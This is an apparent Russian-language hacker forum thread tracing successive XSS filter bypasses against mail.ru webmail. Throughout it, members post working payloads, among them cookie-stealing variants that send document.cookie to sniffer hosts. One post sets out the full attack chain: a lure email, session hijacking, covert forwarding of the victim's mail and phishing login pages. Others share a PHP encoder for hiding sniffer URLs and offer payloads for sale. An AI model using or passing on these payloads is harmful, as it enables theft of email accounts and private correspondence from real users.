Заранее прошу прощения у модераторов за дублирование темы, просто на мой взгляд в этом разделе следует выкладывать _готовые_ уязвимости, а не задавать вопросы по их поиску.

Антология XSS на mail.ru

Не знаю, может кому пригодится, но эволюция фильтра на mail.ru протекала следующим образом. На момент моей регистрации на античате перестала действовать фишка.
<image src=JaVaScRiPt:alert()>
Все были очень удивлены :p Эта бага держалась очень долго...
Следущая ошибка была найдена мной, помог мне Майор, она работала под IE, а я тестил под Оперой) Майор проверил под IE, я ему сперва даже не поверил) Брался fail.txt, в нем в наглую прописывалось:
<script>alert()</script>
и всё это дело переименовывалось в fail.jpg. Но эту филонку сравнительно быстро прекрыли...

Следующим шагом стал пост уже не помню кого... =) Если напомните, то будет хорошо) XSS проходила благодаря двойному кодированию в ASCII слова javascript. При этом этаже бага была одновременно актуальна и для yandex.ru =) Выглядело это так:
<img src="http://server.com/picture.jpg" dynsrc="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:document.images[0].src='http://sniffer.com/sniff.php?cook='+document.cookie">
К сожалению, всё что ушло в большой паблик долго не живет =)

И тут снова Майор, умнейший человек) Я долго ругался когда он мне одному из первых поведал о собственном открытии) Всё было просто и изящно... Чтобы закрыть предыдущую багу, фильтр на Mail.ru стал до бесконечности раскодировать то что закодировано в ASCII... Тогда Майор половину слова javascript закодировал в ASCII и отдельно ещё раз зашифровал каждый символ &. А другую половину поставил через знак табуляции... И фильтр терялся... Выглядело это так:<bgsound src="&#106&#97&#118&#97&#115&#99&#114 ipt:alert()" loop=5> Но и эта уязвимость будучи выложенной долго не продержалась. И вот эта тема коснулась меня) Всю ночь убил на поиски, эксперименты... Мозги уже не варят. XSS выглядит следующим образом:
<font color="green>"style="font-size:1px;background:url\(java/**/script:alert('XSS by Dronga'))">

Вот) Активная, в теле письма... Конечно она ещё сыровата, но общая конструкция видна. В таком виде работает вроде только под ИЕ, сколько не пытался под оперу заточить - бесполезно... Кто будет пробовать - советую поиграть с символами " и `. Что-то типа вот так: color=`green"style

Конечно, может кто-то что-то и покруче нашел, что для всех браузеров применимо, но что я нашел тем и поделился.

PS. Не забываем о приватности раздела и доверии друг другу.

респект, проверим седня

Молоток плюсик те:)

сейчас потестим:):):)

ну вот=) в МОА только достойнейшие=)

Если напомните, то будет хорошо)По мойму дело рук Майора, или ЛиттлЛамера что-то не припомню...
А плюс щас поставим...

Странно, у меня не работает, последние скобки заменяются на подмигивающий смайл.
Добавлено:
Точно про разметку забыл, гост спасибо

каким браузером тестил? хотя скорее всего ты разметку <html></html> не делал, да?

Ребята, всё работает, заходим в раздел E-mail->FAQ, скачиваем програмку XSSTester от LittleLamer, удаляем всё что там забито по дефолту и вставляем мой вариант, ничего не дописываем (никаких <html></html> не надо, их фильтр нещадно режет, вставляем одну единственную строчку - саму XSS). Забиваем информацию для отправки и отправляем. Идем проверяем, ещё раз напоминаю что актуально в таком виде только для IE (у меня IE6 SP2).

Кто-нибудь сформировал запрос, уже со сниффером, просто у меня не получается правильную структуру сделать.

Может что у меня sp1 один стоит поэтому косяки по идее нормально всё должно!

Dronga респект!!!

Кто-нибудь сформировал запрос, уже со сниффером, просто у меня не получается правильную структуру сделать.Держи:<font color="green>"style="font-size:1px;background:url\(java/**/script:document.images[0].src='http://privatesniff/s.jpg?'+document.cookie)">

А я видео снял про XSS на yandex.ru смотрите в разделе видео.

Dronga респект!!!

Держи:<font color="green>"style="font-size:1px;background:url\(java/**/script:document.images[0].src='http://privatesniff/s.jpg?'+document.cookie)">

Я ващет прячу под кодировкой свой снифф. Чего и всем советую. Меня так один раз вычислили когда указал свой снифф.
Пантер, стуканись плз в аську, дело есть.

саняХ поди такая же бага? ;)
а вообще не поленись - напиши еще, мне вот видео влом качать...

Нет не такая воще её просек морф просто в гипер ссылки java скрипты воще не фильтруются втавляешь туда простой запрос чтобы куки пиздит и всё. Прошу добавить мне репутации =))

кстати бага дрона и на рамблере сработала!)

Нет не такая воще её просек морф просто в гипер ссылки java скрипты воще не фильтруются втавляешь туда простой запрос чтобы куки пиздит и всё. Прошу добавить мне репутации =))
А какая? =)
Принцип один и тот же.

Аха точно всё работает прикольно почти на всех почтовых службах можно сесию угнать прикольно!!!

А какая? =)
Принцип один и тот же.
Что то я тебя не понял не много! Ты имеешь ввиду активная или пассивная. Активная там. Вообщем посмотри лучше видео.

кстати бага дрона и на рамблере сработала!)
Скажу более... если ента тема протолкнётся дальше в одном из мыльников, то пипец ваще будет. Правда там с кодировкой надо поиграть. Ваще Дронга молодца! В копилке XSS на мыльниках от тебя (кажись и от МАЙОРа) +1

Хех дронга XSS не работает на yandex'e так что прикольно что нашёл на яндексе. Блин я так старался видео сделать что мне не кто не что не добавят. А воще я так и предполагал что гринам,модерам,админам,Мем� �ерам. Не будет это интересно потому что они самые умные =))

ахаха, джордан - гений, поставлю репу, если напишешь в форуме ну хотя б в этом разделе отдельный топик...

простейший hex-encoder:

<?
$str = str_replace("%20", "", $QUERY_STRING);
for ($i=0; $i<strlen($str); $i++)
{
$hex=dechex(ord($str[$i]));
if ($str[$i]=='&') echo "$str[$i]";
else if ($str[$i]!='\\') echo "%$hex";
}
?>

Вы своими XSS поломали оборудование на mail.ru =)))))))))))))
...
Ошибка
Уважаемый пользователь!
Вы вводите правильный пароль к почтовому ящику.
Открываемый Вами почтовый ящик в данный момент недоступен из-за сбоя в работе оборудования.
Нами ведутся аварийные восстановительные работы.
Пожалуйста, попробуйте повторить попытку входа в почтовый ящик через 3 часа.
Приносим извинения за доставленные неудобства.

ЛОЛ )))
А какими прогами лучше отправлять письмо в ХТМЛ? Ато через веб интерфейс низя на мыл.ру (((

XSS Tester неплохая прога - заюзай поиск по форуму...
+ а у меня нормально на мыло заходит... ну пока помучаем рамблер)

Можешь с rambler.ru, можешь в ЗеБате (Параметры-Формат сообщения) или Оутлуке.
XSS Tester -> http://www.forum.antichat.ru/attachment.php?attachmentid=175

вот на мэйл.ру залезть с кукой - все понятно: или CookieEditor или AccessDiver...

- на рамблере блин в куке всего 1 значение показывает CookieEditor (ruid), когда приходит где-то 5...
- через дайвер пробовал по рефереру зайти + кука - редиректит на rambler.ru

Спасибо всем за старания товарищи, бага не актуальна. Сегодня её прикрыли. Месяц она жила, думаю многие неплохо погрелись на этом. Можно конечно выложить ещё одну и я бы сделал это если бы тут умели хранить секреты. Пальцем ни в кого не тыкаю, но не очень приятно когда ко мне в асю стучатся левые люди и показывают мне мою же Xss... Делаем выводы господа. Всем ещё раз спасибо.

Дронга, не отчаивайся друг. Все летает как по маслу! Админы mail.ru не такие умные люди. Щас катит всебраузеровый вариант:

<img/src='http://////>>>>>\&#+39 style='display:none;&#+39 onerror=confirm()>

тестил только что, спасибо в репе, если я помог

Да помог то помог, только не мне, опять всё повторится... И помоему это не для всех браузеров, сейчас погляжу. Дело в img/src - эту конструкцию не все браузеры принимают, IE на ура, а вот остальные не примут вроде.

Решено спустить в общее.

Думаю, Всем будет интересно почитать историю лома mail.ru.

Кстати, данные ХSS работают на других менее "продвинутых" почтовиках :)
Удачных подвигов!

Помните, данная информация предназначена только для ознакомления. Мы не рекомендуем Вам испытывать данные XSS-эксплоиты.

Powered by Antichat.ru

Наконец-то в паблике =) Сколько шуму было из этой темы. Как раз на момент её создания alsa основал АМА (пожалуй, самый закрытый на сегодня раздел) и я был первым кто в него зашел и первым моим постом в абсолютно пустом разделе стала усовершенствованная XSS. Так хотелось приписать "Первый нах!", ну вы понимаете, момент ведь исторический.

На открытие опять-таки навел Майор, он уже всё обыграв в голове и поняв просто спросил, почему работает это:
<font color="green>"style="font-size:1px;background:url\(java/**/script:alert('XSS by Dronga'))">
.... И меня осенило =) Вот так всё и получается.

<img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert('XSS')> Вот она работала под всеми браузерами, включая FF. Это была бомба к которой имели доступ всего 9 человек с форума =)

Фильтр терялся когда в атрибуте натыкался на закрывающий тег знак > и после него уже не смотрел.. А с точки зрения браузера всё что в кавычках - это атрибут. Поэтому генерилась ошибка и добавив обработчик onerror мы добивались своего =) Из МОА никто не догадался, хотя всё было у них перед глазами)

Пусть теперь все видят и знают что и как обсуждается в закрытых разделах. Ну и конечно стремятся туда. Кстати, из всего этого материала рукой подать до ещё одной активной XSS, но только под IE (Greetz to ZaCo =)

Удачи, господа)

<img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert('XSS')> ,подскажите пожалуйста,что надо вставлТь вместо xss ?

Вообще вот такая запись:
<img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert('XSS')> Это просто наглядно, а вариаций тут может быть куча, можете попробовать даже вот так:
<img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert(1)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif >"onerror=alert('2')>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif >"onerror=alert('3')>Просто дело вашей фантазии.

Отвечаю на вопрос:
<img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=document.images[0].src="http://www.link.com/script_sniffer.php?cooki="+document.cookie;>Что-то около того)

Огромное СПАСИБО!!!!

Честно говоря надоело через хсс, кто б че нового придумал гг

Не могу понять почему не срабатывает...


<img src=\"xss\" width=0 height=0 style=\"top:expression(eval(this.sas));\" width=0 height=0 sas=\"this.src=\'xss\' document.cookie;this.sas=null\" alt=\'\'>

Вот этот код после майловского фильтра...
<img src=\"xss\" width=0 height=0 xstyle=\"top:expression(eval(this.sas));\" width=0 height=0 sas=\"this.src=\"xss\" document.cookie;this.sas=null\" alt=\"\">

А ты не заметил, что style отфильтровался и стал xstyle?? Поэтому и не работает.

Не пойму, но как это все провети? не пойму отправляю письмо в вижео хтмл с кодом? обоснуйте по полочкам, плз

Берёшь абсолютно любое видео на античате, из раздела XSS и на примере mail.ru.

Всё о чём шла речь выше - это способы запустить свой скрипт в браузере жертвы. На практике делается так, отправляется письмо в котором маскируется XSS.. Пользователь получает письмо от некой дамы, например "Katrin", с непонятной темой "MRA"... Девушек то все любят, да и намеки в каждой фразе видят, времена такие.. Открывает и читает:
Privet.. Ya tebe nikogda ne pisala,no sey4as ya buhaya i sama ne znau 4em zanatsa..Daje v translite piwu ot nefig delat.Vot ogladivaus na svou jizn. Molodaya, simpatichnaya, a 4ego-to vse ravno ne hvataet.. Vernee kogo-to. Net, ne podumay, eto ne priznanie v lubvi.. Mi s toboy daje ne znakomi.. I vovse ne sposob poznakomitsa s toboy.. Hota kto ego znaet 4to budet dalwe. Piwu na slu4ainiy yawik, daje ne uverena 4to ti muj4ina.. Samoe glavnoe 4to ya ho4u tebe skazat - po4awe osmatrivaisa, skolko vokrug takih kak ya, molodih, simpatichnih i odinokih? Mojet esli ya hotabi odnogo 4elove4ka zastavlu zadumatsa, to moya jizn stanet lu4we, zna4it ewe ne vse poterano dla lubvi v etom mire.. Ladno, ne zabivay sebe golovu moimi mislami, prosto oglanis i zadumaisa nad etim mirom..А пока он читает, работает код из этого же письма... Всё зависит от фантазии злоумышленника.

Что это может быть??? Да что угодно. Самое банальное, это отправить куки на сниффер и ручками их подменить, а потом спокойно, не вводя никаких паролей попасть в чужой ящик. Никаких знаний практически не нужно, а XSS можно узнать у более сведующих товарищей.

Более продвинутым считается написание скриптов, которые всё сделают за тебя.. Говоря конкретно о mail.ru по собственному опыту: копия всех писем имеющихся в ящике + настройка пересылки всех входящих на твой ящик + удаление письма с сервера. Юзер прочтёт, а при попытке обновить/удалить/переслать увидит надпись "Сообщение удалено с сервера"... Теперь иди свищи и рассказывай, что было, вот только куда-то делось.. Это очень трудоёмкая работа, требующая определенных навыков в програмировании и понимание основ взаимодействия с веб-сервером (запросы, методы аутентификации).

Самые творческие и авантюрные личности идут ещё дальше =) Они используя XSS, перемещают пользователя на поддельную страничку.. Мол произошла ошибка, сессия потеряна.. Страничка в мейловском дизайне, ничего подозрительного, реклама как обычно... После ввода пароля реально перекидывает обратно в ящик... Вот только введённые вами данные уже ушли к хакеру на мыло.

А можно всё совместить =) Вопрос ваших знаний.

Dronga, на Mail.ru разве нет защиты от CSRF?

Dronga, на Mail.ru разве нет защиты от CSRF?

Если ничего не изменилось, то защита имеется, но очень убогая. Всё сводится к проверке кук и реферера. Куки есть, а подделать рефку средствами php не проблема. Единственное что, опционально имеется возможность запрета заходов с разных IP в рамках одной сессии.

Drongo, нет-нет, теорию я то знаю, да и видео у меня есть про это, так вот как вообще заюзать сам вредоносный код, имею хсс в майле, можно подробнее

Хочу спросить по поводу XSS в Mail.Ru.

Если я правильно понял, то вот такой вариант уже не катит:

<img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert('1')>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert(2)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif >"onerror=alert('3')>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif >"onerror=alert('4')>

Я честно попробовал перебить это в десятичную кодировку, получилось что-то типа этого:

<img src="http
://img.mail.ru
/mail/ru/image
s/dumb.gif>"on
error=alert('TEXT'
)>

Поперебирал разные комбинации, но - облом. Был бы у меня декодер - я бы и в шестнадцатиричной попробовал.

Вот я и хочу узнать, это у меня глюки (я, правда, сначала тестил под SP-2, и только потом под незапатченным IE6) или эту дыру заделали?

Может, хотя бы намекнёшь, в какую сторону чесать репу? Я, блин, даже ответ на секретный вопрос знаю, но юзать его нельзя - чел мониторит ящик каждый день, ну и я тоже хотел бы рядом пристроиться:)))

Ну чтож... Продолжая демонстрировать интересные и не очень (кому как) способы обхода фильтра, выкладываю следующую XSS. Конечно же, в таком виде она уже не применима для @mail.ru, но...

<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:
img=new Image();
img.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;">]]>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

В основе данной XSS лежит то, что многие браузеры, в частности IE и Opera, парсят XML. Фильтр пропускал эту конструкцию потому что не видел в ней слова javascript =) А вот браузер видел.. Взяв справочник по XML ты легко разберешься что и почему =)

Очень познавательно! Респект! Надо будет попробывать

вот запалнаю все как надо и код вставлаю а мне пишет Error in connect (SOCKET)

4о делат ктонит потскажет

кажется бага уже прикрыта

молодцы ребята mail.ru быстро работают

А что если чувак пользуется оперой или мозилой.Как вы сбираетесь пиститЬ куки если он сохраняет их жезлом?
В основном продвинутые админы мозилой пользуются а не ИЕ.

10x [=

Значит так. Мне надо xss - любая(конешно кто щедрый и активную можно :) ). Бабла у меня нету и единственное что могу предложить это 3 шестизначки. Вот такие голимые у меня дела... вот.
пишыте на ето: Kolian_hq@mail.ru

ребят, так есть сейчас xss рабочая или ее уже давно прикрыли?

eti xss ni rabotayet

04.12.2005, 09:49
уже больше года прошло =d

Green ya znayu etu realno ya hatil pisat sto noviy xss net katorit rabotayet :)

Есть, её за 5$ продают.+ недавно Грейт выкладывал.

:) tolka 5$ :) ,,, ni doroga ,, a besplatno net ?

:) tolka 5$ :) ,,, ni doroga ,, a besplatno net ?
Бесплатно НЕТ!!! :rolleyes:

ГГ на форуме скорее и сидят парниши с майл ру))) учаться на ошибках) сам подумай, бага тока найдена... час, два, нету её)

http://hosting.mail.ru/Login.jsp?login=%22%3E%3Cscript%3Ealert(%22xss%22) %3C/script%3E

aka PSIH так ведь тема- Активная XSS- а ты дал Пассивную XSS

xss давно не выкладывали, пусть пасивная будет... ;)

Для бравых ребят из майл.ру надо ставить хайд !

Вобще не вижу смысла пасивные выкладывать =)

не в обиду но ета хсс с http://forum.xakep.ru/m_802889/tm.htm

Активвная XSS на mail.ru:

http://forum.antichat.ru/thread31014.html

ну сыпьте в парня плюсы, очень даже заслужил)

Хмм.. А если нашёл пассивку на мейле, её стоит сюда вешать или нет?

З.Ы.
И если я не ошибаюсь, там есть слепой скуль.